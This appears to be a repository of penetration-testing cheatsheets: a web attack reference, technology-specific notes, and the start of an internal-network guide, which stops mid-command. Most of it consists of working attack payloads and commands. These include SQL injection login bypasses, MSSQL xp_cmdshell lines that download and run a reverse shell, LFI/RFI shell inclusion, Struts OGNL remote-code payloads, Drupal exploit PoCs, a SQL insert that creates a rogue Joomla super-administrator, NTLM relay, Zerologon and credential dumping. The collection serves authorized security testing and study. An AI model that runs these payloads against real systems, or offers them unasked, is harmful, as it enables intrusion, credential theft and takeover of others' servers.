Repository layout:

```
├── .gitignore
├── Cheatsheets
│   ├── README.md
│   ├── cheatsheet-references.md
│   ├── external
│   │   ├── 01-web-global.md
│   │   └── 02-web-techno-specific.md
│   ├── internal
│   │   ├── 01-internal-global.md
│   │   ├── 02-wifi.md
│   │   ├── 03-lpe-windows.md
│   │   ├── 04-lpe-linux.md
│   │   ├── 05-post-exploitation-windows.md
│   │   ├── 06-post-exploitation-linux.md
│   │   ├── 07-pivoting.md
│   │   ├── 08-domain-escalation.md
│   │   ├── 09-antivirus-bypass.md
│   │   ├── 10-kerberos.md
│   │   └── 11-wsus.md
│   ├── lab
│   │   └── 01-windows.md
│   ├── mobile
│   │   ├── 01-ios.md
│   │   └── 02-android.md
│   ├── passwords
│   │   ├── brute-force.md
│   │   ├── default-pass.md
│   │   └── hashs.md
│   └── useful-commands
│       ├── git.md
│       ├── python.md
│       ├── screen.md
│       ├── shell.md
│       ├── unix.md
│       └── windows.md
├── README.md
└── assets
    └── images
        └── logo_dark.png
```

/.gitignore:

```
assets/**
```

/Cheatsheets/README.md:

# Summary

## [Cheatsheet references](cheatsheet-references.md)

## External (Web)

* [External Penetration Testing](external/01-web-global.md)
* [Techno Specific](external/02-web-techno-specific.md)

## Internal network

* [Internal Penetration Testing](internal/01-internal-global.md)
* [WIFI](internal/02-wifi.md)
* [Local Privilege Escalation Windows](internal/03-lpe-windows.md)
* [Local Privilege Escalation Linux](internal/04-lpe-linux.md)
* [Post Exploitation Windows](internal/05-post-exploitation-windows.md)
* [Post Exploitation Linux](internal/06-post-exploitation-linux.md)
* [Pivoting](internal/07-pivoting.md)
* [Domain Escalation](internal/08-domain-escalation.md)
* [Antivirus Bypass](internal/09-antivirus-bypass.md)
* [Kerberos](internal/10-kerberos.md)

## Passwords

* [Default pass](passwords/default-pass.md)
* [Brute-force](passwords/brute-force.md)
* [Hashes](passwords/hashs.md)

## Useful Commands

* [Git](useful-commands/git.md)
* [Python](useful-commands/python.md)
* [Screen](useful-commands/screen.md)
* [Shells](useful-commands/shell.md)
* [Unix](useful-commands/unix.md)
* [Windows](useful-commands/windows.md)

/Cheatsheets/cheatsheet-references.md:

# Cheatsheet references

## Full

- [https://github.com/swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
- [https://book.hacktricks.xyz/](https://book.hacktricks.xyz/)
- [https://burmat.gitbook.io/security/](https://burmat.gitbook.io/security/)
- [https://yolospacehacker.com/en/hackersguide.php](https://yolospacehacker.com/en/hackersguide.php)

## AD & Red Team

- [https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/)
- [https://0xsp.com/ad-attack-or-defense/ad-ttps-list](https://0xsp.com/ad-attack-or-defense/ad-ttps-list)
- [https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html](https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html)
- [https://github.com/yeyintminthuhtut/Awesome-Red-Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming)
- [https://ired.team/](https://ired.team/)
- [https://github.com/vysecurity/RedTips](https://github.com/vysecurity/RedTips)
- [https://0x00-0x00.github.io/](https://0x00-0x00.github.io/)
- [https://blog.xpnsec.com/](https://blog.xpnsec.com/)
- [https://egre55.github.io](https://egre55.github.io)
- [https://rastamouse.me/](https://rastamouse.me/)
- [https://posts.specterops.io/](https://posts.specterops.io/)
- [https://dirkjanm.io/](https://dirkjanm.io/)
- [https://adsecurity.org/](https://adsecurity.org/)
- [http://www.labofapenetrationtester.com/](http://www.labofapenetrationtester.com/)

## Linux

- [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

## OSCP

- [https://casvancooten.com/posts/2020/05/oscp-cheat-sheet-and-command-reference/](https://casvancooten.com/posts/2020/05/oscp-cheat-sheet-and-command-reference/)
- [https://github.com/Ondrik8/OSCP_note](https://github.com/Ondrik8/OSCP_note)
- [https://github.com/0x4D31/awesome-oscp](https://github.com/0x4D31/awesome-oscp)

## DFIR

Digital Forensics and Incident Response

- [https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/#)

## Blog

- [https://dirkjanm.io/](https://dirkjanm.io/)
- [https://beta.hackndo.com/](https://beta.hackndo.com/)
- [https://www.dailysecurity.fr/](https://www.dailysecurity.fr/)
- [https://lsdsecdaemon.com/](https://lsdsecdaemon.com/)
- [https://inf0sec.fr/](https://inf0sec.fr/)

/Cheatsheets/external/01-web-global.md:

# External Penetration Testing

## **Automated tools**

### [httpx](https://github.com/projectdiscovery/httpx)

Web prober for fast discovery.

```bash
# Install httpx
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest && httpx -version

# Usage
httpx -l hosts.txt -silent -title -content-length -status-code

# It can also be fed from nmap greppable output files
cat *.gnmap | grep http | awk '{ print $2; }' | uniq | httpx -title -content-length -content-type -status-code -tech-detect -sr -srd ./httpx-responses -vhost -websocket -follow-redirects -ports 25,80,81,135,389,443,1080,3000,3306,8080,8443,8888,9090,8089 -retries 2 -timeout 8 -threads 50 -o httpx-redirects.txt --proxy socks5://127.0.0.1:6666
```

### [subfinder](https://github.com/projectdiscovery/subfinder)

Subfinder is a subdomain discovery tool.

```bash
# Install subfinder
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

# Usage with httpx and dnsx
subfinder -d -silent | httpx -title -content-length -status-code -silent
subfinder -silent -d | dnsx -silent -rcode noerror,servfail,refused
```

### [Nuclei](https://github.com/projectdiscovery/nuclei)

Full scanner based on templates.

```bash
# Install Nuclei
GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei; nuclei -version

# Usage (the proxy flag belongs outside the quoted template pattern)
nuclei -l urls.txt -t 'cves/CVE-2020*' -p socks5://127.0.0.1:6666
```

### [dnsx](https://github.com/projectdiscovery/dnsx)

Fast and multi-purpose DNS toolkit that runs multiple DNS queries.

```bash
# Install dnsx
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest

# Usage
dnsx -l hosts.txt -resp -a -aaaa -cname -mx -ns --soa -txt | awk '{ print $2; }' | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u | uniq > all-ips.txt
```

### [Sn1per](https://github.com/1N3/Sn1per)

Full scanner including many other tools.

```bash
# Install Sn1per
docker run -it xerosecurity/sn1per /bin/bash
sniper -t

# Manual install
git clone https://github.com/1N3/Sn1per && cd Sn1per && bash install.sh && sniper --help
```

### [Autorecon](https://github.com/Tib3rius/AutoRecon)

Full scanner.

```bash
# Install AutoRecon
wget https://raw.githubusercontent.com/Tib3rius/AutoRecon/master/Dockerfile && docker build -t tib3rius/autorecon .
docker run -it -v ~/results:/results --rm --name autorecon-container tib3rius/autorecon --help

# Manual install with pipx
sudo apt update && sudo apt install -y python3 python3-pip python3-venv seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner smbclient smbmap smtp-user-enum snmp sslscan sipvicious tnscmd10g whatweb wkhtmltopdf
python3 -m pip install --user pipx && python3 -m pipx ensurepath
pipx install git+https://github.com/Tib3rius/AutoRecon.git && autorecon --help

# Manual install with python3
git clone https://github.com/Tib3rius/AutoRecon.git && cd AutoRecon && python3 -m pip install -r requirements.txt && cd src/autorecon/ && python3 autorecon.py --help
```

### [Legion](https://github.com/carlospolop/legion)

Full scanner.

```bash
# Manual install (as root)
git clone https://github.com/carlospolop/legion.git /opt/legion && cd /opt/legion/git && ./install.sh && mv /usr/bin/legion /usr/bin/legion2 && ln -s /opt/legion/legion.py /usr/bin/legion && legion
```

### Kali pre-installed

```bash
nikto -C all -output nikto.html -host
```

---

## **Passive discovery**

Google dorks on a domain

```bash
inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git

example.com site:pastebin.com
# search for leaks on pastebin, dehashed, raidforums, snusbase, leakedsource, etc.
```

Extract URLs from a file

```bash
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"
curl http:///file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"
```

Get JS scripts

```bash
go get github.com/tomnomnom/waybackurls
waybackurls | grep "\.js" | sort -u
```

Get information about IPs (alias)

```bash
alias ipinfo='for ip in $(cat hosts.txt); do echo -n "$ip: "; curl -s ipinfo.io/$ip | jq; done'
```

---

## **Active discovery**

### Services

```bash
nmap -sS -sV -O --top-ports 1000 --script=banner,nse,http-head -oA top_1000
nmap -sT -sV -O -p- -oA full_scan
nmap -sU -sV --top-ports 1000 --open -oA udp_1000
```

---

### Subdomains

```bash
amass enum -ip -brute -active -d

gobuster dns -i -w subdomains.txt -d

curl -s https://crt.sh/\?q\=%25.\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | uniq
```

Check which subdomains respond

```bash
cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk
```

Subdomain wordlist generator, then check which generated subdomains resolve

```bash
go install github.com/projectdiscovery/alterx/cmd/alterx@latest
cat targets.txt | alterx -p "{{word}}.{{suffix}}" -pp word=dev | dnsx
```

---

### Vhosts

```bash
nmap --script http-vhosts -p 80,8080,443

gobuster vhost -u -w common-vhosts.txt

wfuzz --hh 0 -H 'Host: FUZZ.' -u http:// --hc 400 -w /usr/share/wordlists/wfuzz/general/common.txt -c

# adding a new vhost to /etc/hosts
echo -e "\t" >> /etc/hosts
```

### Screenshot

Take screenshots of one or many targets

```bash
# Install gowitness
go get -u github.com/sensepost/gowitness

# Usage
gowitness single https://jenaye.fr
gowitness file -p socks5://127.0.0.1:6666 -f ~/.yelaa/rt.txt --screenshot-path ~/.yelaa/rt
gowitness file -f
gowitness nmap -f nmap.xml --open --service-contains http
./gowitness report serve # start the web view with all screenshots
```

---

### Urls

```bash
feroxbuster -u http:/// --proxy socks5://127.0.0.1:5555 -x html,txt,sql,php

dirsearch -u -e php,html,js,xml -x 500,403

wfuzz -c -z file,/root/wordlist.txt --hc 404 /FUZZ
wfuzz -c -z file,/root/wordlist.txt --hc 404 --hl 0 /FUZZ

gobuster dir -u https:// -w ~/wordlists/shortlist.txt -l -v
gobuster fuzz -u https:///?FUZZ=test -w parameter-names.txt
```

URL finder

```bash
wget -qO- https://stackoverflow.com/ | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u
```

Link finder

```bash
# https://github.com/GerbenJavado/LinkFinder
python linkfinder.py -i https:// -d -o cli
```

Directory listing recursive dump

```bash
wget -r --no-parent http:///dir
```

Find assets and parameters

```bash
assetfinder | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
```

---

### Manual upload

```bash
curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http:///newpage
```

---

## **Common attacks**

### All Injections

```bash
)‘“'"`testocd${7*6}{{7*5}}
```

### LFI

Local file inclusion fuzzing

```bash
wfuzz -c -w --hw 0 ?page=../../../../../../../FUZZ
```

Getting a shell from RFI

```bash
?page=http:///shell.php
?page=\\\\shell.php
```

**PHP wrappers**

- PHP Expect

```bash
?page=expect://whoami
```

- PHP data

```bash
?=data:text/plain,
```

- PHP Input

Using a proxy like Burp, change the request to a POST request and use the wrapper "php://input", then put your PHP code into the request body:

```http
POST /=php://input
Host:

```

**access_log**

If you find the access log, you can make a GET request containing your PHP code, then include the log file:

```http
GET /=
Host:

GET /=/var/log/apache2/access.log
Host:
```

**proc/self/environ**

Send the payload in the User-Agent header, then browse the /proc/self/environ file:

```http
GET ?page=../../../proc/self/environ HTTP/1.1
User-Agent:
```

---

### SQLI

**SQL Injection**

Bypass authentication

```bash
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```

Fuzzing a parameter

```bash
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
```

Oracle union based

```bash
tt'
tt' ORDER BY 4--
tt' ORDER BY 3--
tt' UNION SELECT NULL,(select banner from v$version where rownum=1),NULL from DUAL--
tt' UNION SELECT NULL,(select ora_database_name from dual),NULL from DUAL--
tt' UNION SELECT NULL,table_name,NULL from all_tables--
tt' UNION SELECT NULL,column_name,NULL from all_tab_columns where table_name='WEB_ADMINS'--
tt' UNION SELECT NULL,ADMIN_NAME||PASSWORD,NULL from 'WEB_ADMINS'--
```

MSSQL union based

```bash
toto' UNION SELECT TABLE_NAME,NULL FROM information_schema.TABLES--
toto' UNION SELECT column_name,NULL FROM information_schema.COLUMNS--
toto' UNION SELECT pass,NULL FROM users--
toto' UNION SELECT name,NULL FROM users--
toto'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;--
toto';EXEC xp_cmdshell 'certutil -urlcache -f http:///revshell.exe c:\windows\temp\revshell.exe';--
toto';EXEC xp_cmdshell 'c:\windows\temp\revshell.exe';--
```

MSSQL shell

```bash
enable_xp_cmdshell; EXEC xp_cmdshell 'whoami'
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;--;EXEC xp_cmdshell 'whoami'
```

---

### XXE

XML External Entities

- [full list of payloads](https://gist.github.com/staaldraad/01415b990939494879b4)

```bash
# Vanilla, used to verify outbound xxe or blind xxe
:443/test.txt">
]>
&sp;

# OoB extraction
:/sp.dtd">
%sp;
%param3;
%exfil;
]>

## External dtd: ##
:/%data3;'>">
```

---

### SSRF

[ssrfuzz](https://github.com/ryandamour/ssrfuzz)

```bash
go get -u github.com/ryandamour/ssrfuzz

echo "http://" | ssrfuzz scan
echo "http:///test.php?u=" | go run main.go scan
cat file_of_domains.txt | ssrfuzz scan
ssrfuzz scan -d file_of_domains.txt
```

---

### XSS

Cross-Site Scripting

```bash
test+()@example.com
test@example().com
""@example.com

# CloudFlare bypass
```

---

### SSTI

Server Side Template Injection

```bash
{{8*8}}
${9*9}
#{6*6}
<%= 5 * 5 %>

"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
```

---

### ELI

Expression Language Injection

```bash
# J2EEScan detection vector
https://www.example.url/?vulnerableParameter=PRE-${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kzxs.print(#parameters.INJPARAM[0]),#kzxs.print(new java.lang.Integer(829+9)),#kzxs.close(),1?#xx:#request.toString}-POST&INJPARAM=HOOK_VAL

# Blind detection vector
https://www.example.url/?vulnerableParameter=${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#kzxs=@java.lang.Thread@sleep(10000),1?#xx:#request.toString}

# RFI
https://www.example.url/?vulnerableParameter=${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#wwww=new java.io.File(#parameters.INJPARAM[0]),#pppp=new java.io.FileInputStream(#wwww),#qqqq=new java.lang.Long(#wwww.length()),#tttt=new byte[#qqqq.intValue()],#llll=#pppp.read(#tttt),#pppp.close(),#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kzxs.print(new java.lang.String(#tttt)),#kzxs.close(),1?#xx:#request.toString}&INJPARAM=/etc/passwd

# DIR LIST
https://www.example.url/?vulnerableParameter=${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#wwww=new java.io.File(#parameters.INJPARAM[0]),#pppp=#wwww.listFiles(),#qqqq=@java.util.Arrays@toString(#pppp),#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kzxs.print(#qqqq),#kzxs.close(),1?#xx:#request.toString}&INJPARAM=..

# RCE LINUX
https://www.example.url/?vulnerableParameter=${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#wwww=@java.lang.Runtime@getRuntime(),#ssss=new java.lang.String[3],#ssss[0]="/bin/sh",#ssss[1]="-c",#ssss[2]=#parameters.INJPARAM[0],#wwww.exec(#ssss),#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kzxs.print(#parameters.INJPARAM[0]),#kzxs.close(),1?#xx:#request.toString}&INJPARAM=touch /tmp/InjectedFile.txt

# RCE WINDOWS
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```

---

## **Bypass WAF**

SSRF localhost

```bash
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01
```

X-Header

```bash
Accept: application/json, text/javascript, */*; q=0.01
Host: localhost
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwarded-Host: IP
```

NullByte

```bash
file.jpg%00shell.php
shell.php%00file.jpg
shell.php%00.jpg
```

---

## **Burp Extenders**

Extension|Description
---|----
`Retire.js`|[find vulnerable JavaScript libraries](https://github.com/PortSwigger/retire-js)
`Autorize`|[find privilege escalations by replaying admin requests as a simple user](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f)

/Cheatsheets/external/02-web-techno-specific.md:

# Techno Specific

## **CMS**

### Tools

```sh
# cmsmap
git clone https://github.com/Dionach/CMSmap && cd CMSmap && pip3 install .
cmsmap.py -o cmsmap.log

# wig
git clone https://github.com/jekyc/wig.git && cd wig && python3 setup.py install
wig.py -w wig.log

# wpseku
git clone https://github.com/m4ll0k/WPSeku.git && cd WPSeku && pip install -r requirements.txt
python wpseku.py --target

# droopescan
pip install droopescan
droopescan scan drupal -t 32 -u [-U list_of_urls.txt]

# joomscan
joomscan -u
```

---

### Wordpress

WPScan (needs an API key)

```sh
wpscan -v --proxy socks5://127.0.0.1:9090 -e u1-100,ap,at,cb,dbe --passwords rockyou.txt --api-token --url
```

* ap: all plugins
* at: all themes
* cb: config backups
* dbe: database export

Find version

* in the XML feed at website.com/rss
* HTML source code
* CMSmap or WPScan

**XMLrpc**

List methods

```http
POST /xmlrpc.php HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 95

system.listMethods
```

If there is pingback, try:

```bash
pingback.ping
http://:
http://:/toto
```

---

### Drupal

- Burp Intruder from 0 to 500 on /node/$

```bash
/imce
```

POC1 drupal 8

```bash
curl -k -i '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
  --data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=uname -a'
```

POC2 drupal 8

```bash
curl -k -i '/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \
  --data 'form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=touch+/tmp/2'
```

POC3 drupal 7

```bash
curl -k -s '/drupal-7.55/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a' \
  --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id
```

---

### Joomla

Joomla 1.5

```bash
user:md5_gen(1)MD5$SALT
```

* [https://www.exploit-db.com/exploits/6234](https://www.exploit-db.com/exploits/6234)
* [http://www.passwordtool.hu/joomla-password-hash-generator-salt-key](http://www.passwordtool.hu/joomla-password-hash-generator-salt-key)

Create new users

```sql
INSERT INTO jos_users (name, username, password, usertype, gid, params) VALUES ('toto', 'toto', 'fcba92f4dd6b902f8a66054b8327ae6b:F2sVBzlFOUl51D3HtRZ0tionaJQGQqB', 'Super Administrator', 25, '');
INSERT INTO jos_core_acl_aro VALUES (NULL, 'users', LAST_INSERT_ID(), 0, 'toto', 0);
INSERT INTO jos_core_acl_groups_aro_map VALUES (25, '', LAST_INSERT_ID());
```

---

## Moodle

- [https://github.com/inc0d3/moodlescan](https://github.com/inc0d3/moodlescan)

```bash
# sudo apt update && sudo apt install python3 python3-pip && cd moodlescan && pip3 install -r requirements.txt
python3 moodlescan.py -k -u
```

---

## **Websocket**

### Enumeration using STEWS

You can use: https://github.com/PalindromeLabs/STEWS/blob/main/vuln-detect/STEWS-vuln-detect.py

### SQL injection

- [Python MITM](https://gist.github.com/jenaye/2b0a369ed85de912926fec69c4f07167)

Run `python3 mitm_websocket.py ws://localhost:8156/ws`, then point sqlmap at the proxy: `sqlmap -u "http://localhost:8081/?id=1" --batch --dbs`

---

## **Reactjs**

- [React Developer Tools](https://addons.mozilla.org/fr/firefox/addon/react-devtools/) (edit props/state/hooks values)

**Security Testers**: Inject JavaScript and JSON wherever you can and see what happens.

**Developers**: Don't ever use `eval()` or `dangerouslySetInnerHTML`. Avoid parsing user-supplied JSON.

---

## Webpack configuration (.map)

Use sourcemapper

```bash
for i in $(cat url.txt); do ./sourcemapper -url $i.map -output output_dir; done
```

## **Angularjs**

Check for uses of the bypassSecurityTrustX functions and innerHTML

```bash
bypassSecurityTrustHtml
bypassSecurityTrustScript
bypassSecurityTrustStyle
bypassSecurityTrustUrl
bypassSecurityTrustResourceUrl
```

---

## **ckfinder**

```bash
ckfinder/ckfinder.html
```

---

## **Git**

- [GitTools Dumper](https://github.com/internetwache/GitTools/tree/master/Dumper)
- [git-dumper](https://github.com/arthaud/git-dumper)

Run a script from the post-merge hook in .git/hooks (see https://docs.gitlab.com/ee/administration/custom_hooks.html)

---

## **Stormshield**

- [test for default password](https://github.com/jenaye/netasq-1300)

[Stormshield Documentation](https://documentation.stormshield.eu/SNS/v3/fr/Content/CLI_Serverd_Commands_reference_Guide_v3/Introduction.htm)

```bash
# Check default password: UpdatePasswd=1 if the factory password is still set, 0 if it has already been changed
CHPWD
101 code=00a01000 msg="Begin" format="section" [Result] UpdatePasswd=0
```

---

## **Fortigate**

- [CVE-2018-13379](https://www.exploit-db.com/exploits/47288)

```sh
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
```

---

## **Dana**

```bash
https://XXXX/dana-na/setup/psalinstall.cgi
```

## **SSL / TLS**

* [testssl.sh](https://github.com/drwetter/testssl.sh)

OpenSSL

```bash
openssl s_client -cipher BEAST -connect :443
openssl s_client -connect :443 -ssl3

# Expiration date
openssl s_client -connect :443 | openssl x509 -noout -dates
```

Check Heartbleed

```bash
cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done
```

Check Lucky13

```bash
openssl s_client -cipher DES-CBC3-SHA -connect xx.fr:443
```

---

## **Android**

Apktool

```bash
apktool d app_name.apk
```

Extract sensitive info

```bash
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/
```

/Cheatsheets/internal/01-internal-global.md:

# Internal Penetration Testing

## 1. **No network access**

### Wi-Fi

* Crack WPA or crack/replay PEAP

> For more details, see the next cheatsheet: [WiFi](02-wifi.md)

### NAC - MAC filtering

1. Spoof the MAC, static IP and gateway IP of an authorized device (e.g. a printer or VoIP phone), and disconnect it:
```sh
macchanger -m [MAC] [Interface]
```
2. Force your static IP to match the one of the device whose MAC you spoofed:
```sh
sudo ifconfig /24 && sudo ip route add default via
```

### NAC - 802.1X

* [Fenrir](https://github.com/Orange-Cyberdefense/fenrir-ocd) (IEEE 802.1X bypass)

---

## 2. **No account yet**

### Coerce (Null session)

`wget https://gist.githubusercontent.com/zblurx/99fe1971562593fd1211931bdc979fbb/raw/6e18ba3b0694303d6eca3fda8505cf800ef83540/esc8fuzzer.py`

then `esc8fuzzer.py `

This checks whether the ESC8 vulnerability is present.

If it is, you can set up a relay and obtain a PFX certificate:

`certipy relay -ca -template 'Domaincontroller'`

then run

`petitPotam.py -d ` to get the PFX, then

`certipy auth -pfx administrator.pfx -dc-ip `

`export KRB5CCNAME=/workspace/administrator.ccache`
`secretsdump -k -no-pass /'administrator$'@administrator.`

It's also possible to run the relay with this command:
> `ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs --template DomainController`

but then you have to use `gettgtpkinit.py -pfx-base64 $(cat cert.base64) ''/administrator$'@administrator.` to get the TGT

### Physical access

Boot from Kali Linux and dump creds

```bash
fdisk -l
mount /dev/ /mnt
cd /mnt/Windows/system32/Config
impacket-secretsdump -system SYSTEM -sam SAM -security SECURITY -local
```
> For more details, see the next cheatsheet: [Windows Post Exploitation](05-post-exploitation-windows.md)

---

### Network Access

**Get-DC-IP**

```
nslookup -type=ANY _ldap._tcp.dc._msdcs.
nslookup gc._msdcs.
```

With [DC Detector](https://github.com/noraj/dcdetector)

```
dcd -d
```

**Man-In-The-Middle**

Responder + NTLMrelayx

```bash
# 1. First we need to edit Responder.conf:
sudo vim /usr/share/responder/Responder.conf
SMB = Off # Turn this off
HTTP = Off # Turn this off

# 2. Then we create a list of targets:
## For a small range
crackmapexec smb --gen-relay-list relaylistOutputFilename.txt
## For a big range
nmap -T4 -Pn -p 445 --open -oA
cat *.gnmap | grep -i "open/tcp" | cut -d " " -f2 | sort -u > perim_up_smb.txt
crackmapexec smb perim_up_smb.txt --gen-relay-list relaylistOutputFilename.txt

# 3. Then we can run ntlmrelayx
impacket-ntlmrelayx -tf relaylistOutputFilename.txt -smb2support --output-file relayed-hash.txt

# also:
impacket-ntlmrelayx -tf relaylistOutputFilename.txt -socks -smb2support --output-file relayed-hash-with-socks.txt
# if you get socks
# [*] Authenticating against smb://192.168.1.3 as \ SUCCEED
# [*] SOCKS: Adding /@192.168.1.3(445) to active SOCKS connection. Enjoy
# you can do this: `proxychains smbclient.py -no-pass /@`
# make sure /etc/proxychains.conf is set to 1080

# 4. Finally, using another shell, we can run Responder
## Light
./Responder.py -I eth0
## Medium (enable wpad, netbios domain and wredir suffix queries)
./Responder.py -I eth0 -dw
## Full (Force WPAD and ProxyAuth)
./Responder.py -I eth0 -dwFP
```

> If limited to a Windows system, you can use Inveigh instead of Responder:
- [Inveigh](https://github.com/Kevin-Robertson/Inveigh)

mitm6 + NTLMrelayx

```bash
sudo mitm6 -d --ignore-nofqdn
impacket-ntlmrelayx -tf relaylistOutputFilename.txt -6 --output-file relayed-hash.txt

# If no smb available, try ldap/ldaps/mssql:
impacket-ntlmrelayx -t ldaps:// -l lootdir
```

ARP (use with caution!)

- Bettercap
- Cain.exe (& Abel)

**Zerologon**

```
zerologon-exploit '' ''

secretsdump -just-dc -no-pass \$@

# Get hexpass of machine account
secretsdump -hashes :'' ''/'Administrator'@''

# Use hexpass to restore
zerologon-restore ''/''@'' -target-ip '' -hexpass 'xxx'
```

---

**Port and service scan**

Host discovery from huge ranges

masscan on a single port

`masscan -p 445 --rate=10000 | cut -d ' ' -f 6 >> 445-open.txt`

zmap on a single port (linux and windows)

```bash
sudo apt install zmap && sudo rm /etc/zmap/blacklist.conf && sudo touch /etc/zmap/blacklist.conf
sudo zmap -p22 10.0.0.0/8 192.168.0.0/16 -o zmap_linux.ips
sudo zmap -p445 10.0.0.0/8 192.168.0.0/16 -o zmap_windows.ips
```

masscan on identified ranges

```bash
cat zmap_*.ips |awk -F.
